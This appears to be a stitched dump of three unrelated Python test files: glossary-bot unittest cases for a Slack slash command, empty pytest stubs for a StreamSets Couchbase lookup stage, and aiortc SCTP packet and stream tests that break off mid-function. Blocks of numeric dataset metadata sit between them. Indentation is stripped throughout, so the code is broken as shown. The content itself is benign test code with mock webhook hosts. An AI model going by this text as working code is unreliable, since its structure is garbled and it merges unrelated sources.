for term in check_terms:
self.assertTrue(term in random1)
self.assertTrue(term in random2)
self.assertTrue(term in random3)
def test_all_learnings(self):
''' All learnings are returned when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S', u'T', u'U', u'V', u'W', u'X']
check = []
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
check.insert(0, u'{}W'.format(letter))
# get all learnings
robo_response = self.post_command(text=u'learnings all')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
# if 'all' is part of the command, other limiting params are ignored
robo_response = self.post_command(text=u'learnings all 5')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
robo_response = self.post_command(text=u'learnings 5 3 all')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
robo_response = self.post_command(text=u'learnings all 3 5')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
def test_some_learnings(self):
''' Only a few learnings are returned when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S', u'T', u'U', u'V', u'W', u'X']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
limit = 7
check = [u'{}W'.format(item) for item in list(reversed(letters[-limit:]))]
# get some learnings
robo_response = self.post_command(text=u'learnings {}'.format(limit))
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
def test_offset_learnings(self):
''' An offset of learnings are returned when requested
'''
# set some values in the database
letters = [u'E', u'F', u'G', u'H', u'I', u'J', u'K', u'L', u'M', u'N', u'O', u'P', u'Q', u'R', u'S', u'T', u'U', u'V', u'W', u'X']
for letter in letters:
self.post_command(text=u'{letter}W = {letter}ligibility Worker'.format(letter=letter))
limit = 7
offset = 11
check = [u'{}W'.format(item) for item in list(reversed(letters[-(limit + offset):-offset]))]
# get some learnings
robo_response = self.post_command(text=u'learnings {} {}'.format(limit, offset))
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u', '.join(check) in robo_response.data)
def test_learnings_language(self):
''' Language describing learnings is numerically accurate
'''
# ask for learnings before any values have been set
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'I haven\'t learned any definitions yet.' in robo_response.data)
# when one value has been set
self.post_command(text=u'EW = Eligibility Worker')
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'I recently learned the definition for' in robo_response.data)
# when more than one value has been set
self.post_command(text=u'FW = Fligibility Worker')
robo_response = self.post_command(text=u'learnings')
self.assertEqual(robo_response.status_code, 200)
self.assertTrue(u'I recently learned definitions for' in robo_response.data)
def test_get_help(self):
''' Help is properly returned by the bot
'''
# testing different chunks of help text with each response
robo_response = self.post_command(text=u'help')
self.assertTrue(u'to show the definition for a term' in robo_response.data)
robo_response = self.post_command(text=u'?')
self.assertTrue(u'to set the definition for a term' in robo_response.data)
robo_response = self.post_command(text=u'')
self.assertTrue(u'to delete the definition for a term' in robo_response.data)
robo_response = self.post_command(text=u' ')
self.assertTrue(u'to see this message' in robo_response.data)
def test_custom_slash_command_for_private_requests(self):
''' A slash command other than /gloss is echoed in the bot's response
'''
test_command = u'/gg'
# the help command
robo_response = self.post_command(text=u'help', slash_command=test_command)
self.assertTrue(u'*{}'.format(test_command) in robo_response.data)
self.assertFalse(u'*/gloss' in robo_response.data)
# ask for a definition that doesn't exist
robo_response = self.post_command(text=u'EW', slash_command=test_command)
self.assertTrue(u'*{}'.format(test_command) in robo_response.data)
self.assertFalse(u'*/gloss' in robo_response.data)
# get a definition that does exist
self.post_command(text=u'EW = Eligibility Worker', slash_command=test_command)
robo_response = self.post_command(text=u'EW', slash_command=test_command)
self.assertTrue(u'{}'.format(test_command) in robo_response.data)
self.assertFalse(u'/gloss' in robo_response.data)
# get the error message for a bogus set
robo_response = self.post_command(text=u'AW =', slash_command=test_command)
self.assertTrue(u'*{}'.format(test_command) in robo_response.data)
self.assertFalse(u'*/gloss' in robo_response.data)
def test_custom_slash_command_for_public_stats(self):
''' A slash command other than /gloss is echoed in the bot's response
to a public stats request.
'''
test_command = u'/gg'
# set and get a definition to generate some stats
self.post_command(text=u'EW = Eligibility Worker')
self.post_command(text=u'EW')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['text'])
self.assertTrue(u'{command} stats'.format(command=test_command) in payload['text'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'stats', slash_command=test_command)
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_custom_slash_command_for_public_definition(self):
''' A slash command other than /gloss is echoed in the bot's response
to a public definition request.
'''
test_command = u'/gg'
# set and get a definition to generate some stats
self.post_command(text=u'EW = Eligibility Worker')
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['text'])
self.assertTrue(u'{command} EW'.format(command=test_command) in payload['text'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW', slash_command=test_command)
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_custom_slash_command_for_public_learnings(self):
''' A slash command other than /gloss is echoed in the bot's response
to a public learnings request.
'''
test_command = u'/gg'
# capture the bot's POST to the incoming webhook and test its content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
self.assertIsNotNone(payload['text'])
self.assertTrue(u'{command} learnings'.format(command=test_command) in payload['text'])
return response(200)
# send a POST to the bot to request stats
with HTTMock(response_content):
fake_response = self.post_command(text=u'learnings', slash_command=test_command)
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
def test_get_quiet_definition(self):
''' The bot will send a quiet definition when told to do so
'''
# set & test a definition
self.post_command(text=u'EW = Eligibility Worker')
filter = Definition.term == u'EW'
definition_check = self.db.session.query(Definition).filter(filter).first()
self.assertIsNotNone(definition_check)
self.assertEqual(definition_check.term, u'EW')
self.assertEqual(definition_check.definition, u'Eligibility Worker')
# send a POST to the bot to request the quiet definition
robo_response = self.post_command(text=u'EW')
self.assertTrue(u'glossie' in robo_response.data)
self.assertTrue(u'EW: Eligibility Worker' in robo_response.data)
# at least one request was recorded in the interactions table
interaction_check = self.db.session.query(Interaction).first()
self.assertIsNotNone(interaction_check)
self.assertEqual(interaction_check.user_name, u'glossie')
self.assertEqual(interaction_check.term, u'EW')
self.assertEqual(interaction_check.action, u'found')
def test_bad_set_commands(self):
''' We get the right error back when sending bad set commands
'''
robo_response = self.post_command(text=u'EW =')
self.assertTrue(u'You can set definitions like this' in robo_response.data)
robo_response = self.post_command(text=u'=')
self.assertTrue(u'You can set definitions like this' in robo_response.data)
robo_response = self.post_command(text=u'= = =')
self.assertTrue(u'You can set definitions like this' in robo_response.data)
def test_bad_image_urls_rejected(self):
''' Bad image URLs are not sent in the attachment's image_url parameter
'''
# set some definitions with bad image URLs
self.post_command(text=u'EW = http://kittens.gif')
self.post_command(text=u'FW = httpdoggie.jpeg')
self.post_command(text=u'GW = http://stupid/goldfish.bmp')
self.post_command(text=u'HW = http://s.mlkshk-cdn.com/r/13ILU')
# capture the bot's POSTs to the incoming webhook and test the content
def response_content(url, request):
if 'hooks.example.com' in url.geturl():
payload = json.loads(request.body)
attachment = payload['attachments'][0]
self.assertIsNotNone(attachment)
self.assertIsNone(attachment['image_url'])
return response(200)
# send POSTs to the bot to request the definitions
with HTTMock(response_content):
fake_response = self.post_command(text=u'EW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
fake_response = self.post_command(text=u'FW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
fake_response = self.post_command(text=u'GW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
fake_response = self.post_command(text=u'HW')
self.assertTrue(fake_response.status_code in range(200, 299), fake_response.status_code)
if __name__ == '__main__':
unittest.main()
| 48.114322
| 138
| 0.65208
| 4,899
| 38,299
| 4.977955
| 0.078383
| 0.067413
| 0.054127
| 0.068561
| 0.859433
| 0.8434
| 0.807848
| 0.789027
| 0.77041
| 0.745766
| 0
| 0.009997
| 0.239954
| 38,299
| 795
| 139
| 48.174843
| 0.827064
| 0.134834
| 0
| 0.668571
| 0
| 0
| 0.121049
| 0
| 0
| 0
| 0
| 0
| 0.48
| 1
| 0.085714
| false
| 0
| 0.015238
| 0
| 0.121905
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
436f2f143a25f1bfb1fe7c6b6eec8ca32078704e
| 5,819
|
py
|
Python
|
stage/configuration/test_couchbase_lookup_processor.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | null | null | null |
stage/configuration/test_couchbase_lookup_processor.py
|
Sentienz/datacollector-tests
|
ca27988351dc3366488098b5db6c85a8be2f7b85
|
[
"Apache-2.0"
] | 1
|
2019-04-24T11:06:38.000Z
|
2019-04-24T11:06:38.000Z
|
stage/configuration/test_couchbase_lookup_processor.py
|
anubandhan/datacollector-tests
|
301c024c66d68353735256b262b681dd05ba16cc
|
[
"Apache-2.0"
] | 2
|
2019-05-24T06:34:37.000Z
|
2020-03-30T11:48:18.000Z
|
import pytest
from streamsets.testframework.decorators import stub
@stub
def test_advanced_environment_settings(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'BUCKET'}, {'authentication_mode': 'USER'}])
def test_authentication_mode(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_bucket(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'BUCKET'}])
def test_bucket_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_cipher_suites(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_connect_timeout_in_ms(sdc_builder, sdc_executor):
pass
@stub
def test_disconnect_timeout_in_ms(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV'}])
def test_document_key(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_key_value_timeout_in_ms(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_keystore_file(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_keystore_key_algorithm(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_keystore_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'keystore_type': 'JKS', 'use_tls': True},
{'keystore_type': 'PKCS12', 'use_tls': True}])
def test_keystore_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV'}, {'lookup_type': 'N1QL'}])
def test_lookup_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'missing_value_behavior': 'ERROR'}, {'missing_value_behavior': 'PASS'}])
def test_missing_value_behavior(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL', 'multiple_value_behavior': 'FIRST'},
{'lookup_type': 'N1QL', 'multiple_value_behavior': 'MULTI'}])
def test_multiple_value_behavior(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL'}])
def test_n1ql_query(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_node_list(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'on_record_error': 'DISCARD'},
{'on_record_error': 'STOP_PIPELINE'},
{'on_record_error': 'TO_ERROR'}])
def test_on_record_error(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'USER'}])
def test_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_preconditions(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV', 'return_properties': True}, {'lookup_type': 'N1QL'}])
def test_property_mappings(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL'}])
def test_query_timeout_in_ms(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
def test_required_fields(sdc_builder, sdc_executor):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV', 'return_properties': False},
{'lookup_type': 'KV', 'return_properties': True}])
def test_return_properties(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'KV', 'return_properties': False}])
def test_sdc_field(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'lookup_type': 'N1QL', 'submit_as_prepared_statement': False},
{'lookup_type': 'N1QL', 'submit_as_prepared_statement': True}])
def test_submit_as_prepared_statement(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_transport_protocols(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_truststore_file(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_truststore_password(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': True}])
def test_truststore_trust_algorithm(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'truststore_type': 'JKS', 'use_tls': True},
{'truststore_type': 'PKCS12', 'use_tls': True}])
def test_truststore_type(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'use_tls': False}, {'use_tls': True}])
def test_use_tls(sdc_builder, sdc_executor, stage_attributes):
pass
@stub
@pytest.mark.parametrize('stage_attributes', [{'authentication_mode': 'USER'}])
def test_user_name(sdc_builder, sdc_executor, stage_attributes):
pass
| 27.975962
| 121
| 0.720914
| 707
| 5,819
| 5.558699
| 0.113154
| 0.198473
| 0.112468
| 0.181679
| 0.847328
| 0.816285
| 0.788295
| 0.745293
| 0.745293
| 0.733079
| 0
| 0.002619
| 0.147104
| 5,819
| 207
| 122
| 28.111111
| 0.78924
| 0
| 0
| 0.583942
| 0
| 0
| 0.208147
| 0.025095
| 0
| 0
| 0
| 0
| 0
| 1
| 0.248175
| false
| 0.284672
| 0.014599
| 0
| 0.262774
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
43856960b785ebf1b364ad9964ab651a69b42ea2
| 92,156
|
py
|
Python
|
tests/test_rtcsctptransport.py
|
AlexVestin/cloneaio
|
5792c819482ed7e19252b8b0c00532a0932e0b3b
|
[
"BSD-3-Clause"
] | 4
|
2019-09-02T22:26:03.000Z
|
2020-09-02T18:13:29.000Z
|
tests/test_rtcsctptransport.py
|
AlexVestin/cloneaio
|
5792c819482ed7e19252b8b0c00532a0932e0b3b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_rtcsctptransport.py
|
AlexVestin/cloneaio
|
5792c819482ed7e19252b8b0c00532a0932e0b3b
|
[
"BSD-3-Clause"
] | 2
|
2021-03-04T04:05:54.000Z
|
2021-03-25T07:33:43.000Z
|
import asyncio
from unittest import TestCase
from unittest.mock import patch
from aiortc.exceptions import InvalidStateError
from aiortc.rtcdatachannel import RTCDataChannel, RTCDataChannelParameters
from aiortc.rtcsctptransport import (SCTP_DATA_FIRST_FRAG, SCTP_DATA_LAST_FRAG,
SCTP_DATA_UNORDERED, USERDATA_MAX_LENGTH,
AbortChunk, CookieEchoChunk, DataChunk,
ErrorChunk, ForwardTsnChunk,
HeartbeatAckChunk, HeartbeatChunk,
InboundStream, InitChunk, ReconfigChunk,
RTCSctpCapabilities, RTCSctpTransport,
SackChunk, ShutdownAckChunk,
ShutdownChunk, ShutdownCompleteChunk,
StreamAddOutgoingParam,
StreamResetOutgoingParam,
StreamResetResponseParam, parse_packet,
serialize_packet, tsn_minus_one,
tsn_plus_one)
from .utils import dummy_dtls_transport_pair, load, run
def outstanding_tsns(client):
return [chunk.tsn for chunk in client._sent_queue]
def queued_tsns(client):
return [chunk.tsn for chunk in client._outbound_queue]
def track_channels(transport):
channels = []
@transport.on('datachannel')
def on_datachannel(channel):
channels.append(channel)
return channels
async def wait_for_outcome(client, server):
final = [
RTCSctpTransport.State.ESTABLISHED,
RTCSctpTransport.State.CLOSED,
]
for i in range(100):
if client._association_state in final and server._association_state in final:
break
await asyncio.sleep(0.1)
class SctpPacketTest(TestCase):
def roundtrip_packet(self, data):
source_port, destination_port, verification_tag, chunks = parse_packet(data)
self.assertEqual(source_port, 5000)
self.assertEqual(destination_port, 5000)
self.assertEqual(len(chunks), 1)
output = serialize_packet(source_port, destination_port, verification_tag, chunks[0])
self.assertEqual(output, data)
return chunks[0]
def test_parse_init(self):
data = load('sctp_init.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, InitChunk))
self.assertEqual(chunk.type, 1)
self.assertEqual(chunk.flags, 0)
self.assertEqual(len(chunk.body), 82)
self.assertEqual(repr(chunk), 'InitChunk(flags=0)')
def test_parse_init_invalid_checksum(self):
data = load('sctp_init.bin')
data = data[0:8] + b'\x01\x02\x03\x04' + data[12:]
with self.assertRaises(ValueError) as cm:
self.roundtrip_packet(data)
self.assertEqual(str(cm.exception), 'SCTP packet has invalid checksum')
def test_parse_init_truncated_packet_header(self):
data = load('sctp_init.bin')[0:10]
with self.assertRaises(ValueError) as cm:
self.roundtrip_packet(data)
self.assertEqual(str(cm.exception), 'SCTP packet length is less than 12 bytes')
def test_parse_cookie_echo(self):
data = load('sctp_cookie_echo.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, CookieEchoChunk))
self.assertEqual(chunk.type, 10)
self.assertEqual(chunk.flags, 0)
self.assertEqual(len(chunk.body), 8)
def test_parse_abort(self):
data = load('sctp_abort.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, AbortChunk))
self.assertEqual(chunk.type, 6)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(13, b'Expected B-bit for TSN=4ce1f17f, SID=0001, SSN=0000'),
])
def test_parse_data(self):
data = load('sctp_data.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, DataChunk))
self.assertEqual(chunk.type, 0)
self.assertEqual(chunk.flags, 3)
self.assertEqual(chunk.tsn, 2584679421)
self.assertEqual(chunk.stream_id, 1)
self.assertEqual(chunk.stream_seq, 1)
self.assertEqual(chunk.protocol, 51)
self.assertEqual(chunk.user_data, b'ping')
self.assertEqual(repr(chunk),
'DataChunk(flags=3, tsn=2584679421, stream_id=1, stream_seq=1)')
def test_parse_data_padding(self):
data = load('sctp_data_padding.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, DataChunk))
self.assertEqual(chunk.type, 0)
self.assertEqual(chunk.flags, 3)
self.assertEqual(chunk.tsn, 2584679421)
self.assertEqual(chunk.stream_id, 1)
self.assertEqual(chunk.stream_seq, 1)
self.assertEqual(chunk.protocol, 51)
self.assertEqual(chunk.user_data, b'M')
self.assertEqual(repr(chunk),
'DataChunk(flags=3, tsn=2584679421, stream_id=1, stream_seq=1)')
def test_parse_error(self):
data = load('sctp_error.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ErrorChunk))
self.assertEqual(chunk.type, 9)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(1, b'\x30\x39\x00\x00'),
])
def test_parse_forward_tsn(self):
data = load('sctp_forward_tsn.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ForwardTsnChunk))
self.assertEqual(chunk.type, 192)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.cumulative_tsn, 1234)
self.assertEqual(chunk.streams, [
(12, 34),
])
self.assertEqual(repr(chunk),
'ForwardTsnChunk(cumulative_tsn=1234, streams=[(12, 34)])')
def test_parse_heartbeat(self):
data = load('sctp_heartbeat.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, HeartbeatChunk))
self.assertEqual(chunk.type, 4)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(1, b'\xb5o\xaaZvZ\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00{\x10\x00\x00'
b'\x004\xeb\x07F\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00')
])
def test_parse_reconfig_reset_out(self):
data = load('sctp_reconfig_reset_out.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ReconfigChunk))
self.assertEqual(chunk.type, 130)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(13, b'\x8b\xd8\n[\xe4\x8b\xecs\x8b\xd8\n^\x00\x01')
])
# Outgoing SSN Reset Request Parameter
param_data = chunk.params[0][1]
param = StreamResetOutgoingParam.parse(param_data)
self.assertEqual(param.request_sequence, 2346191451)
self.assertEqual(param.response_sequence, 3834375283)
self.assertEqual(param.last_tsn, 2346191454)
self.assertEqual(param.streams, [1])
self.assertEqual(bytes(param), param_data)
def test_parse_reconfig_add_out(self):
data = load('sctp_reconfig_add_out.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ReconfigChunk))
self.assertEqual(chunk.type, 130)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(17, b'\xca\x02\xf60\x00\x10\x00\x00')
])
# Add Outgoing Streams Request Parameter
param_data = chunk.params[0][1]
param = StreamAddOutgoingParam.parse(param_data)
self.assertEqual(param.request_sequence, 3389191728)
self.assertEqual(param.new_streams, 16)
self.assertEqual(bytes(param), param_data)
def test_parse_reconfig_response(self):
data = load('sctp_reconfig_response.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ReconfigChunk))
self.assertEqual(chunk.type, 130)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.params, [
(16, b'\x91S\x1fT\x00\x00\x00\x01')
])
# Re-configuration Response Parameter
param_data = chunk.params[0][1]
param = StreamResetResponseParam.parse(param_data)
self.assertEqual(param.response_sequence, 2438143828)
self.assertEqual(param.result, 1)
self.assertEqual(bytes(param), param_data)
def test_parse_sack(self):
data = load('sctp_sack.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, SackChunk))
self.assertEqual(chunk.type, 3)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.cumulative_tsn, 2222939037)
self.assertEqual(chunk.gaps, [(2, 2), (4, 4)])
self.assertEqual(chunk.duplicates, [2222939041])
self.assertEqual(repr(chunk),
'SackChunk(flags=0, advertised_rwnd=128160, cumulative_tsn=2222939037, '
'gaps=[(2, 2), (4, 4)])')
def test_parse_shutdown(self):
data = load('sctp_shutdown.bin')
chunk = self.roundtrip_packet(data)
self.assertTrue(isinstance(chunk, ShutdownChunk))
self.assertEqual(repr(chunk),
'ShutdownChunk(flags=0, cumulative_tsn=2696426712)')
self.assertEqual(chunk.type, 7)
self.assertEqual(chunk.flags, 0)
self.assertEqual(chunk.cumulative_tsn, 2696426712)
class ChunkFactory:
def __init__(self, tsn=1):
self.tsn = tsn
self.stream_seq = 0
def create(self, frags, ordered=True):
chunks = []
for i, frag in enumerate(frags):
flags = 0
if not ordered:
flags |= SCTP_DATA_UNORDERED
if i == 0:
flags |= SCTP_DATA_FIRST_FRAG
if i == len(frags) - 1:
flags |= SCTP_DATA_LAST_FRAG
chunk = DataChunk(flags=flags)
chunk.protocol = 123
chunk.stream_id = 456
if ordered:
chunk.stream_seq = self.stream_seq
chunk.tsn = self.tsn
chunk.user_data = frag
chunks.append(chunk)
self.tsn += 1
if ordered:
self.stream_seq += 1
return chunks
class SctpStreamTest(TestCase):
def setUp(self):
self.factory = ChunkFactory()
def test_duplicate(self):
stream = InboundStream()
chunks = self.factory.create([b'foo', b'bar', b'baz'])
# feed first chunk
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
# feed first chunk again
with self.assertRaises(AssertionError) as cm:
stream.add_chunk(chunks[0])
self.assertEqual(str(cm.exception), 'duplicate chunk in reassembly')
def test_whole_in_order(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo']) +
self.factory.create([b'bar']))
# feed first unfragmented
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foo'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 1)
# feed second unfragmented
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 1)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'bar'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 2)
def test_whole_out_of_order(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo']) +
self.factory.create([b'bar']) +
self.factory.create([b'baz', b'qux']))
# feed second unfragmented
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed third partial
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
# feed first unfragmented
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foo'),
(456, 123, b'bar'),
])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 2)
def test_fragments_in_order(self):
stream = InboundStream()
chunks = self.factory.create([b'foo', b'bar', b'baz'])
# feed first chunk
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0]])
self.assertEqual(stream.sequence_number, 0)
# feed second chunk
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0], chunks[1]])
self.assertEqual(stream.sequence_number, 0)
# feed third chunk
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [
chunks[0], chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foobarbaz'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 1)
def test_fragments_out_of_order(self):
stream = InboundStream()
chunks = self.factory.create([b'foo', b'bar', b'baz'])
# feed third chunk
stream.add_chunk(chunks[2])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[2]])
self.assertEqual(stream.sequence_number, 0)
# feed first chunk
stream.add_chunk(chunks[0])
self.assertEqual(stream.reassembly, [chunks[0], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [])
self.assertEqual(stream.reassembly, [chunks[0], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
# feed second chunk
stream.add_chunk(chunks[1])
self.assertEqual(stream.reassembly, [
chunks[0], chunks[1], chunks[2]])
self.assertEqual(stream.sequence_number, 0)
self.assertEqual(list(stream.pop_messages()), [
(456, 123, b'foobarbaz'),
])
self.assertEqual(stream.reassembly, [])
self.assertEqual(stream.sequence_number, 1)
def test_unordered_no_fragments(self):
stream = InboundStream()
chunks = (
self.factory.create([b'foo'], ordered=False) +
